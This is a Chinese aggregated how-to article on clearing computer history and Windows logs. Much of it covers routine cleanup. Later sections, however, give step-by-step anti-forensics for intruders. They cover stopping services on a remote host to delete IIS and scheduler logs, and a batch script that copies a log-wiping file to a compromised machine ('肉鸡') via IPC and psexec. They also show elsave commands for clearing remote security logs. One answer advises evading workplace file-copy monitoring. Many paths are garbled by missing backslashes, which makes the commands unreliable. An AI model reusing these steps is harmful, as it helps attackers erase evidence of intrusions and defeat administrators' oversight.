电脑怎么清理日志（如何清理电脑日志） - 杂七乱八

本篇文章给大家谈谈电脑怎么清理日志，以及如何清理电脑日志对应的知识点，希望对各位有所帮助，不要忘了收藏本站喔。

本文目录一览：

1、怎样清除电脑记录
2、电脑日志清除方式
3、如何清理电脑日志
4、如何删除电脑日志
5、Win7系统要批量删除C盘中的log日志文件的方法
6、关于日志文件的清除。

怎样清除电脑记录

问题一：怎么清除电脑里所有的历史记录下载软件360安全卫士，在软件主页面上有选项，“清理垃圾”，“清理痕迹”，有这两项基本上就可以晴空你所有的记录，包括最近打开的文档，曾经登饥的网站，曾经使用过的搜索词，不过注意，这两项同样也会清除你在某些网站的登录密码，在下一次登陆这些网页的时候要重新输入用户名和密码。

问题二：如何删除电脑使用记录这个我早就研究过了，呵呵。

1：如果清除网页浏览记录，那要看你用什么浏览器了，一般在菜单栏――工具――清除浏览记录就好了，浏览器也可以设置不保存最近开启的网址。

2：最近开启的文档在开始菜单――文档里就能看到，如果清除最近开启的文档：

一；右击开始菜单――属性――选「开始」菜单――自定义――高级――在最下面

（列出我最近打开的文档）前面的勾去掉――再点击清除列表 ――确定这样即清除了，以后也不会保存了。

二；还有一种方法开始运行――输入 gpedit.msc 回车，进入组策略――选择左边用户配置下的-管理模板-任务和「开始」菜单选项里双击（不胆保存最近打开的文档记录）

(退出时清除最近打开的文档的记录）两个都选中已启用就好了。剩下的我就不用说了，你懂得，呵呵。

问题三：怎样删除电脑上的文件拷贝记录。 1打开C:\Documents and Settings\登陆用的用户名\Recent。

2.这个文件夹系统默认的是隐藏的，要系统显示所有文件和文件夹才能看见（步骤：

3.打开我的电脑--工具---文件夹项---查看-----显示所有文件和文件夹

完成）

4.之后把Recent里面所有文件全部删除，就可以把操作记录全部删除。

5.监控应该是有数据流向记录的，可以把文件拷贝到没有监控的电脑再拷贝

问题四：怎样彻底删除qq在电脑上的记录 Program Files\Tencent\QQ\Users 从你安装QQ的目录里把你的号删除

在C:\Program Files\Tencent\QQ文件夹下面，删除我们不需要的qq号码命名的文件夹，需要的号码不要删除。然后在QQ文件夹里面找到 “AutoLogin.dat”和“LoginUinList.dat”，并将其删掉，就可以了。“AutoLogin.dat”是自动登录的文件，而 LoginUinList.dat文件则存放着本机所有登录号码的信息。

然后重新启动QQ，登录对话框里面的号码消失了

问题五：怎么清除电脑上面的历史记录 IE--工具--Internet选项--内容--自动完成的设置--去掉表单的勾选--确定

如果地址栏出现你从来没有上过的网站是中了中文上网之类的流氓插件了,你可以先到添加/删除程序卸载掉这些程序后下个超级兔子清理系统并注册表即可,下载地址:

crsky/soft/2924

问题六：怎么查看和删除电脑的开机记录？查看电脑使用记录

查看开关机

打开“我的电脑”，C盘Windows目录下有很多文件，找到一个SchedLgU.txt 它是“计划任务”的日志，会忠实地记录电脑计划任务的执行情况，还有每次开机启动Windows系统的信息。这下哪怕他半夜里偷偷开电脑，我早上一查就知道了。

查看文档记录

开始→我最近的文档，点开这里就可以查看他最近都写了什么文档，看了什么电影、图片。

查看上网记录

只要他用IE浏工器浏览任何网站，在Windows＼History的文件夹里都将自动保持记录，最近的可记录99天的一切操作过程，包括去过什么网站、看过什么图片、打开过什么文件等信息。

更简单的方法就是打开IE浏览器，在地址栏的边上有一个下拉的按键，点一下，就可以看到最近上网比较频繁的网站了。

楼主明白了吧,把那些文件删了就OK了!

问题七：怎样清除部分电脑开机记录 360安全清理垃圾鸡菜单运行gpedit.msc回车键，用户配置――管理模版――任务栏和菜单――不要保留文件记录――单击“已启用”

问题八：怎么删除电脑“运行”里的搜索记录试试这个方法

任务栏上右击,--属性--开始菜单--自定义--清除列表

问题九：电脑玩过的记录怎么删除？这样做，你打开电脑C盘耿打开WINDOWS文件夹下temp文件，将里面的临时文件删除，因为temp可以记录你所做过的动作。这样就可以了。最好是从其他途径或者一些系统盘自带的一键清理工具，清楚使用痕迹。你也可以用WINDOWS系统自带的磁盘清理工具来进行清理。具体做法是：我的电脑右键选择计算机管理，选择磁盘碎片整理，依次进行分析和整理即可。

问题十：如何完全删除电脑上所有的浏览记录和视频观看记录？第一种方法：点击“工具”――“Internet选项”――“清除历史记录”和“清除Cookies”. 确定即可。

第二种方法：使用上网助手等工具，锭面清理痕迹。

第三种方法：手动删除缓存目录。

C:\Documents and Settings\ld\Local Settings\History

C:\Documents and Settings\ld\Local Settings\Temp

C:\Documents and Settings\ld\Local Settings\Temporary Internet Files

把这三个文件夹里面的内容全部删除,就全删干净了。

电脑怎么清理日志（如何清理电脑日志）,电脑怎么清理日志,信息,文章,视频,第1张

电脑日志清除方式

点击开始菜单——选择“控制面板”，打开控制面板窗口——选择“管理工具”，打开管理工具窗口——选择“事件查看器”，双击打开。如下图：

在“事件查看器”窗口里，选择左侧的“系统”，你就可以看到你的Windows系统日志了。那么要怎么清除Windows系统日志呢，很简单，在“系统”上点击右键，选择“清楚所有事件”即可。如下图：

通过上面的操作就可以清除Windows系统日志了，除了系统日志文件外，还有那些错误报告等，也能清楚！

如何清理电脑日志

日志完美清理总结

一:开始 – 程序 – 管理工具 – 计算机管理 – 系统工具-事件查看器，然后清除日志。

二: Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。

日志文件默认位置:

应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%system32config，默认文件大小512KB，管理员都会改变这个默认大小。

安全日志文件:%systemroot%system32configSecEvent.EVT;

系统日志文件:%systemroot%system32configSysEvent.EVT;

应用程序日志文件:%systemroot%system32configAppEvent.EVT;

Internet信息服务FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1，默认每天一个日志;

Internet信息服务WWW日志默认位置:%systemroot%system32logfilesw3svc1，默认每天一个日志;

Scheduler服务日志默认位置:%sys temroot%schedlgu.txt;

以上日志在注册表里的键:

应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的:

HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。

Schedluler服务日志在注册表中

HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent

FTP和WWW日志详解:

FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex(年份)(月份)(日期)，例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开，如下例:

#Software: Microsoft Internet Information Services 5.0 (微软IIS5.0)

#Version: 1.0 (版本1.0)

#Date: 20001023 0315 (服务启动时间日期)

#Fields: time cip csmethod csuristem scstatus

0315 127.0.0.1 [1]USER administator 331 (IP地址为127.0.0.1用户名为administator试图登录)

0318 127.0.0.1 [1]PASS –530 (登录失败)

032:04 127.0.0.1 [1]USER nt 331 (IP地址为127.0.0.1用户名为nt的用户试图登录)

032:06 127.0.0.1 [1]PASS –530 (登录失败)

032:09 127.0.0.1 [1]USER cyz 331 (IP地址为127.0.0.1用户名为cyz的用户试图登录)

0322 127.0.0.1 [1]PASS –530 (登录失败)

0322 127.0.0.1 [1]USER administrator 331 (IP地址为127.0.0.1用户名为administrator试图登录)

0324 127.0.0.1 [1]PASS –230 (登录成功)

0321 127.0.0.1 [1]MKD nt 550 (新建目录失败)

0325 127.0.0.1 [1]QUIT –550 (退出FTP程序)

从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统，换了四次用户名和密码才成功，管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名，如上例入侵者最终是用administrator用户名进入的，那么就要考虑更换此用户名的密码，或者重命名administrator 用户。

WWW日志:

WWW服务同FTP服务一样，产生的日志也是在%sys temroot%sys tem32LogFilesW3SVC1目录下，默认是每天一个日志文件，下面是一个典型的WWW日志文件

#Software: Microsoft Internet Information Services 5.0

#Version: 1.0

#Date: 20001023 03:091

#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)

20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

通过分析第六行，可以看出2000年10月23日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp,这位用户的浏览器为compatible; MSIE 5.0; Windows 98 DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。

既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP。

属性里记录了出现警告的原因，是因为有人试图用administator用户名登录，出现一个错误，来源是FTP服务。

这里有两种图标:钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标，表示四次失败审核，事件类型是帐户登录和登录、注销失败，日期为2000年10月18日，时间为1002，这就需要重点观察。

双点第一个失败审核事件的，即得到此事件的详细描述。

经过分析我们可以得知有个CYZ的工作站，用administator用户名登录本机，但是因为用户名未知或密码错误(实际为密码错误)未能成功。另外还有DNS服务器日志，不太重要，就此略过(其实是我没有看过它)。

知道了Windows2000日志的详细情况，下面就要学会怎样删除这些日志:

通过上面，得知日志文件通常有某项服务在后台保护，除了系统日志、安全日志、应用程序日志等等，它们的服务是Windos2000的关键进程，而且与注册表文件在一块，当Windows2000启动后，启动服务来保护这些文件，所以很难删除，而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。首先要取得Admnistrator密码或Administrators组成员之一，然后Telnet到远程主机，先来试着删除FTP日志:

D:SERVERdel schedlgu.txt

D:SERVERSchedLgU.Txt

进程无法访问文件，因为另一个程序正在使用此文件。说过了，后台有服务保护，先把服务停掉!

D:SERVERnet stop “task scheduler”

下面的服务依赖于Task Scheduler 服务。停止Task Scheduler 服务也会停止这些服务。

Remote Storage Engine

是否继续此操作? (Y/N) [N]: y

Remote Storage Engine 服务正在停止….

Remote Storage Engine 服务已成功停止。

Task Scheduler 服务正在停止.

Task Scheduler 服务已成功停止。

OK，它的服务停掉了，同时也停掉了与它有依赖关系的服务。再来试着删一下!

D:SERVERdel schedlgu.txt

D:SERVER

没有反应?成功了!下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务，然后再删日志!

D:SERVERsystem32LogFilesMSFTPSVC1del ex*.log

D:SERVERsystem32LogFilesMSFTPSVC1

以上操作成功删除FTP日志!再来WWW日志!

D:SERVERsystem32LogFilesW3SVC1del ex*.log

D:SERVERsystem32LogFilesW3SVC1

OK!恭喜，现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它!

D:SERVERsystem32LogFilesW3SVC1net stop eventlog

这项服务无法接受请求的 “暂停” 或 “停止” 操作。没办法，它是关键服务。如果不用第三方工具，在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开 “控制面板”的“管理工具”中的“事件查看器”(98没有，知道用Win2k的好处了吧)，在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单，点击它，输入远程计算机的IP，然后等上数十分钟，接着选择远程计算机的安全性日志，右键选择它的属性:点击属性里的“清除日志”按钮，OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志! 目前在不借助第三工具的情况下，能很快，很顺利地清除FTP、WWW还有Schedlgu日志，就是系统日志和安全日志属于Windows2000的严密守护，只能用本地的事件查看器来打开它，因为在图形界面下，加之网速又慢，如果你银子多，时间闲，还是可以清除它的。综上所述，介绍了Windows2000的日志文件以及删除方法，但是你必须是Administrator，注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于Windows 2000 Professional 计算机，也适用于作为独立服务器或成员服务器运行的Windows 2000 Server 计算机。

至此，Windows2000安全知识基础讲座完毕，还有几句话要讲，大家也看出来了，虽然FTP等等日志可以很快清除，但是系统日志和安全日志却不是那么快、那么顺利地能删除，如果遇到聪明的管理员，将日志文件转移到另一个地方，那更是难上加难，所以奉劝大家，千万不要拿国内的主机做试验，国内的法律很严呀!今天吃饭时，听说有两个人开玩笑，一个人把另外一个人的东西藏起来了，结果那个人一急，报案了，于是藏东西那个人被判四年刑!!法官说法律是不开玩笑的!!!所以大家一定要牢记这点!

如何删除电脑日志

在运行中键入：eventvwr.msc

打开事件查看器

分为3类，可以在每个分类上点击右键，然后选择“删除”，但是不能单条删除，只能删除这1类的全部日志。

Win7系统要批量删除C盘中的log日志文件的方法

当你在进行电脑软件操作的时候，会产生大量日志文件，这些文件以log为后缀，日志文件会存放在C盘，多了会影响系统的运行速度，需要将其删除，那么Win7系统要如何批量删除C盘中的log日志文件呢？

方法

一、打开计算机，进入到C盘（系统盘）；

二、然后在文件夹右上方搜索框中输入 *.log ，这时系统就会开机搜索C盘下所有的Log 日志文件，如下图；

三、等到搜索完毕后，我们按下CTRL + A 快捷键，全选Log文件，使用del来删除文件！

最后，我们再清空一下回收站，就可以将C盘中的.所有log日志文件删除干净了！

PS：在搜索中 “*”星号代表任意文件名，.log 表示以log为后缀的文件！

清除Win7系统C盘log日志文件的方法就介绍到这里了，你还在一个一个的慢慢删除日志文件吗？试试批量删除吧。

关于日志文件的清除。

说实话我不太懂,帮你找到这篇文章,你研究一下好了:

什么是日志文件？它是一些文件系统集合，依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时，数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的，无论是网络管理员还是黑客都非常重视日志，一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能，而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防，日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%system32config。

安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志，可以用管理员的身份来登录Windows，然后在“控制面板”中进入“管理工具”，再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了，里面有应用程序、安全和系统日志文件。举个例子，比方说你想清除安全日志，可以右键点击“安全日志”，在弹出的菜单中选择“属性”。接下来在弹出的对话框中，点击下面“清除日志”按钮就可以清除了，如果你想以后再来清除这些日志的话，可以将“按需要改写尺寸”，这样就可以在达到最大日志尺寸时进行改写事件了，不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入侵的企图，保护自己的系统。所以如果你是黑客，入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：

@copy del.bat ＼%1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec ＼%1 c:del.bat

@echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了Ipc连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use ＼ip pass /user: user，然后在命令行下执行如下命令：elsave -s ＼ip -l application -C，这样就删除了安全日志。

关于电脑怎么清理日志和如何清理电脑日志的介绍到此就结束了，不知道你从中找到你需要的信息了吗？如果你还想了解更多这方面的信息，记得收藏关注本站。